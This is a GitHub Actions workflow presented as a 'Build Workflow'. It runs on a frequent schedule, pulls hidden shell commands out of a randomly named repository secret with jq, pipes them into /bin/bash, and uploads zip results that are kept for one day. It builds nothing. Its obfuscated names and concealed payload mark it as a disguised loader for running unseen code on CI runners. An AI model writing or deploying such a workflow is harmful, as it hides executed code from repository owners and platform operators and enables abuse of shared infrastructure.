name: Build Workflow
on:
  workflow_dispatch:

  schedule:
    - cron: '25 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Perform
        env:
          tenuo89: ${{ secrets.tenuo89 }}
        run: |
          printf '%s' "$tenuo89" | jq -r .ecrz5 | /bin/bash
          printf '%s' "$gdqqt4" | jq -r .oqlbb7 | /bin/bash
          echo $vxa47 | jq -r .tw440 | /bin/bash

      - name: Upload results
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Sfc4repG
          path: "*.zip"
          retention-days: 1
